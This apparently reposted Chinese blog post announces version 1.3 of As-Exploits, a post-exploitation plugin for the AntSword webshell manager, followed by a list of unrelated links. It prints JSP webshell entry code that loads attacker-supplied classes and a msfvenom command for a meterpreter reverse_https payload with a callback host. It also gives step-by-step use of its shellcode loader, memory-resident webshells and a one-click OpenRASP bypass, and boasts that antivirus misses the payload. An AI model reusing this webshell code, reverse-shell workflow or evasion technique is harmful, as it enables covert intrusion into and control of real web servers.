As-Exploits v1.3更新
更新主要内容
v 1.3 (2021/5/14)
equals支持数组传参方式,兼容各种容器
jsp新增 ShellCode加载器模块,内置两种分别基于jna跟java agent的shellcode加载方式
jsp新增 Bypass OpenRASP 模块,thx@Godzilla
JarLoader模块 新增手动上传方式,解决因Tomcat最大POST长度为2m导致无法加载内存Jar的问题
reGeorg内存马改为更稳定的neo-reGerog,默认密码:asexploits
冰蝎内存马支持3.7,去除pageContext依赖,兼容Spring等容器
各模块兼容JDK5
挑几个重点的说说
Shell入口参数支持数组形式
Shell入口参数即下面new Object[]{request,response}的部分。
<%String cls = request.getParameter("ant");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});}
%>
至于为什么要改这个玩意要从内存马的兼容说起。
除了由于写法问题而导致的各种乱七八糟的问题以外,连接内存马的一个主要问题是冰蝎在入口处采用了pageContext这个类来获取request response session对象。但是以filter型内存马为例,doFilter中三个参数分别是ServletRequest,ServletResponse,FilterChain,并不存在pageContext这个东西,并且在SpringBoot这种容器里根本没有pageContext这个类。
于是就有很多师傅提出了自己的解决办法,大体分为三种:
自己声明一个pageContext类,在里面实现对应的request跟response的getter setter。冰蝎改造之不改动客户端=>内存马。
改写冰蝎的入口为request+response,不再采用pageContext作为入口。但是弊端就是不能再用equals了,要重新写一个方法用反射调用。冰蝎改造之适配基于tomcat Filter的无文件webshell
采用蚁剑原来的Custom模式,把恶意函数直接通过字节码打进去,然后通过方法名调用。不过由于直接编译恶意函数的字节码较大会超过最大长度限制,一般要先写入目标然后配合URLClassLoader才能使用。使用WebLogic CVE-2020-2883配合Shiro rememberMe反序列化一键注入蚁剑shell
以上的这些方法可以是可以,但是不够优雅。
回想我们最开始的问题,为什么要用pageContext,是为了拿到当前请求的上下文,更精确一点就是输入输出:request,response。request是接收参数,response是回显,两者缺一不可。
后来自己调试的时候发现在request中本身就包含了当前的response,同样response中也包含了当前的request。
当时就想着我shell中传个request,然后在payload里面利用反射把requst里面的response取出来,或者response里面的request取出来不就完事了?
这样确实可以,在2020年9月4日,勤劳的我一大早就起来写了一波代码,然后发了上去,commit记录可以证明我没有瞎bb。当时蚁剑算是最早兼容内存马的。
因为Tomcat喜欢用门面模式,所以要反射两层,结果后来发现在WebLogic下用不了了,因为WebLogic不喜欢搞门面模式,只需要反射一层就够了。
行吧,那我就再加一种情况,在JSP V1.4版本又增加了一层反射的情况。
本来以为没事了,后来又发现在有shiro的情况下打一个servlet内存马进去,这时候去连接内存马需要反射三次??
WTF???
然后意识到,这种case by case的解决方式是不行的,世界上还有那么多种Web容器中间件,不可能一个一个去调吧。
所以为了彻底解决这个问题,在520师傅的建议下采用了数组的方式将两者直接传进去,把分析的逻辑放在打内存Shell的时候去做,而不在payload里面去做。
现在冰蝎跟哥斯拉也都有了相应的机制,思路大体是一样的,感兴趣的小伙伴可以自己研究一下。
JarLoader模块新增手动上传方式
内存加载
直接通过HTTP包将Jar打入目标内存,仅需选择本地需要上传的Jar文件即可,期间文件不落地。但是Tomcat默认POST最大上传大小为2M,如果超过了此大小请选择手动上传模式。
手动上传
先手动将Jar上传到目标服务器上,然后通过路径加载。
JSP ShellCode加载器
内置两种加载方式,使用之前请务必认真阅读使用说明,否则可能直接将Java进程打挂。
需要注意两点:
- 使用MSF需要加上
PrependMigrate=true PrependMigrateProc=xxxx.exe
参数,自动迁移到新的进程,否则会在migrate/exit的时候把Java进程给干掉,导致网站瘫痪。例如:msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.88.129 LPORT=8888 PrependMigrate=true PrependMigrateProc=svchost.exe -f hex
- JNA方式只需要X86类型的ShellCode即可,而Attach方式需要根据目标Java位数来选择对应的ShellCode。
JNA方式
利用第三方库JNA进行ShellCode的加载。
适用范围:JDK>=1.5
正确操作
首先利用Jar加载器将
ShellCodeLoader.jar
上传到目标服务器目录并加载。使用MSF或者CS生成x86类型的shellcode,并开启监听。
在ShellCode加载器模块,输入hex或者java格式的shellcode,且不能有多余换行跟空格。
点击exploit,等待返回回话。
JNA方式测试
装了360,火绒,电脑管家
上传插件ext目录下的ShellcodeLoader.jar到目标服务器,然后复制文件路径
手动加载到JVM中
MSF生成Shellcode
选择JNA方式,exploit!
直接上线,杀软没有拦截
关于jna会生成一个临时文件的问题,发现确实会生成一个dll临时文件在Tomcat临时目录下
但是扫了一下发现是免杀的
VT检测结果0/68,也就是说落地也问题不大。
不过可能这篇文章出来之后就没了
Attach
模拟java agent注入过程来实现Shellcode的加载。这个native方法是jdk自带的,并且经过oracle签名的,理论上免杀效果更好。
适用范围:JDK>=1.6
正确操作
基本信息,exploit,Ctrl+F 搜索
sun.arch.data.model
,查看java位数根据java位数生成对应位数的shellcode,并开启监听。
在ShellCode加载器模块,输入hex或者java格式的shellcode,且不能有多余换行跟空格。
点击exploit,等待返回回话。
Attach方式测试
发现是64位java
CS生成对应位数的shellcode,选择java格式导出。
粘贴到插件中,在exploit的一刻会自动格式化为hex
直接上线,杀软没有拦截。
一键Bypass OpenRASP
借鉴自哥斯拉的插件:Godzilla-BypassOpenRasp
一键绕过OpenRASP
目标安装有OpenRASP且开启命令执行拦截
exploit!
再次运行,即可执行命令
其他
reGeorg内存马改为更稳定的neo-reGerog,默认密码:asexploits
冰蝎内存马去除pageContext依赖,兼容Spring等容器
各模块兼容JDK5
项目地址
https://github.com/yzddmr6/As-Exploits
来颗star吧~
http://www.taodudu.cc/news/show-3813962.html
相关文章:
- Metasploit 如何使用Exploits(漏洞)
- Vue 单页应用 的 首屏优化
- Matlab在最优化计算中的应用
- android正在升级正在优化应用程序,Android正在启动,优化应用是怎么回事,最近每次开机都这样。...
- 贝叶斯优化方法和应用综述
- android应用安装包大小优化
- 唯快不破:提升Web 应用的 13 个优化
- 机器学习模型应用以及模型优化的一些思路
- Android应用优化方案一
- Android应用优化方案四
- Android应用优化方案三
- Android应用优化
- 应用优化
- 10、mysql底层知识进阶-mysql应用层优化
- Android性能优化之加快应用启动速度
- Android应用性能优化之使用SparseArray替代HashMap
- App 启动时间优化方法详解
- 平面向量
- 向量组
- 什么是向量?_1
- 向量究竟是什么?
- Eclipse开发工具介绍
- 开发人员必备!6大不可缺少的工具
- 企业Java网站开发工具
- 常用的网页开发工具有哪些
- 82个Web开发者工具汇总
- 2011年被捕的八大黑客
- 回顾2011年被捕的八大黑客
- 2010年网络个人隐私十大威胁 谷歌街景上榜
- 称所有iPad都不安全是警告还是叫嚣?
As-Exploits v1.3更新相关推荐
- As-Exploits v1.4更新
@yzddmr6 更新日志 v 1.4 (2021/7/24) aspx新增 内存马 模块 aspx新增 内存马管理 模块 jsp新增filter内存马 jsp内存马管理模块增强,支持filter.s ...
- RISC-V IDE MounRiver Studio V1.51更新点介绍
RISC-V IDE MRS V1.51更新点介绍 一. 更新点概述 [新增] 1.支持嵌入式系统Harmony LiteOS-M.RT-Thread开发,支持芯片型号:CH32V103,CH32V3 ...
- 两个列表合并去重_花生AI论文去重V1.4更新合并查同义词功能
点击蓝字关注我们 01 更新记录 V1.0版首次发布 2020/4/17 V1.1版更新 2020/4/20 V1.2版更新 2020/4/24 增加了OCR文字识别功能 增加了截图功能 提升了稳定 ...
- 空间闹钟-v1.6更新!
(假设图片无法显示可查看我的qq空间:http://user.qzone.qq.com/805853418/blog/1398785778) 生活助手系列--空间闹钟================= ...
- onda 昂达 V919 air ch V1 系统更新win10最新版无bug--wifi修复和开机键音量键修复
帖子时间2019.01.09 本人前几天入手的昂达V919 air ch V1 昂达系统一路升级上来的,1803 V17134.472版本测试开机键完好,wifi完好,蓝牙完好,开心 说下注意事项: ...
- Subversion之路--实现精细的目录访问权限控制(v1.0 更新于2006.12.05)(二)
深入 ==== 本章将详细介绍前一章所涉及的两个配置文件, svnserve.conf 和 authz.conf,通过对配置逐行的描述,来阐明其中的一些细节含义.除此之外的其他配置.安装等内容,不是本 ...
- 软考云题库Web版题库V1.1更新功能
这一周软考云题库Web版迎来了一次重要的迭代更新,已于2020/1/5 日更新发布了,试用的同学可以前往试用体验新功能了.如果您有好的建议和意见也欢迎留言交流. 本次更新内容 首页调整,增加考试倒计时 ...
- 循序渐进学运维-服务篇V1版更新完毕
我是互联网老辛,关注我吧,给自己每天的进步找一个机会和理由,不要被无效信息淹没,免除知识焦虑 前言 循序渐进学运维系列的基础篇参考: 喜大普奔:<循序渐进学运维>第一阶段完稿 本次完结的是 ...
- qq阅读java2009_在线书城全新改版 QQ阅读Java版 V1.7更新
漫步春意浓浓的樱花园,享受阳光阅读气息!QQ阅读Java1.7版激情发布,带来精彩,也带来快乐!书城页面全新改版,精彩小说完美展现.同时为潮流女生专门增加"粉红记忆"皮肤.客户端更 ...
最新文章
- Wireshark实验HTTP
- mysql linux 使用索引_正确使用MySQL索引
- ajax请求挂起_Ajax请求内部循环挂起浏览器?
- python 字符串替换_Python,字符串。替换()和\n
- 华为Hi Suite - Android智能设备新管家
- windows server 2012 dhcp 配置故障转移
- thinking-in-java(13) String字符串
- boost学习之命令行参数解析库program_options
- vue模块单独封装html,在vue中怎么定义自定义组件?
- Centos6.7下安装python连接mysql环境故障解决
- 三边测量定位算法C语言实现
- [计算机英语]句子翻译(只含unit1.3.4.5.7.8.9.12)
- 《月满西楼》——李清照
- 世界非著名的十大奇迹
- 遵循亚马逊标准!Kindle 电子书专业制作教程
- 测试窗体的FormBorderStyle属性,不同属性所对应的窗体边框显示情况
- 2021中大厂php+go面试题(2)
- 使用python画k均值分类图
- TM4C123系列ARM单片机开发入门介绍
- 查看Chrome浏览器版本及下载对应的webdriver,并下载安装